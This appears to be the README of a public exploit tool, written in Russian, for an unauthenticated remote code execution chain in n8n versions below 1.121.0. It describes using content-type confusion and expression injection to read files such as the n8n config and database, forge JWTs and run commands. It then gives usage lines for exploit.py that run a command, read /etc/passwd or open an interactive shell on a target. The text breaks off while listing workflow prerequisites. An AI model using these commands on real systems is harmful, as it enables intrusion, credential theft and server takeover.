
Эксплуатационная цепочка для неаутентифицированного удалённого выполнения кода в n8n, объединяющая путаницу с типом содержимого и инъекцию выражений для чтения файлов, подделки JWT и выполнения команд.
Неаутентифицированная цепочка RCE для n8n < 1.121.0 (CVSS 10.0)
/home/node/.n8n/config и database.sqlitechild_process# Выполнить команду
python3 exploit.py http://target:5678 /form/test --cmd "id"
# Прочитать файл
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# Интерактивная оболочка
python3 exploit.py http://target:5678 /form/test
Цель должна иметь активный рабочий процесс с: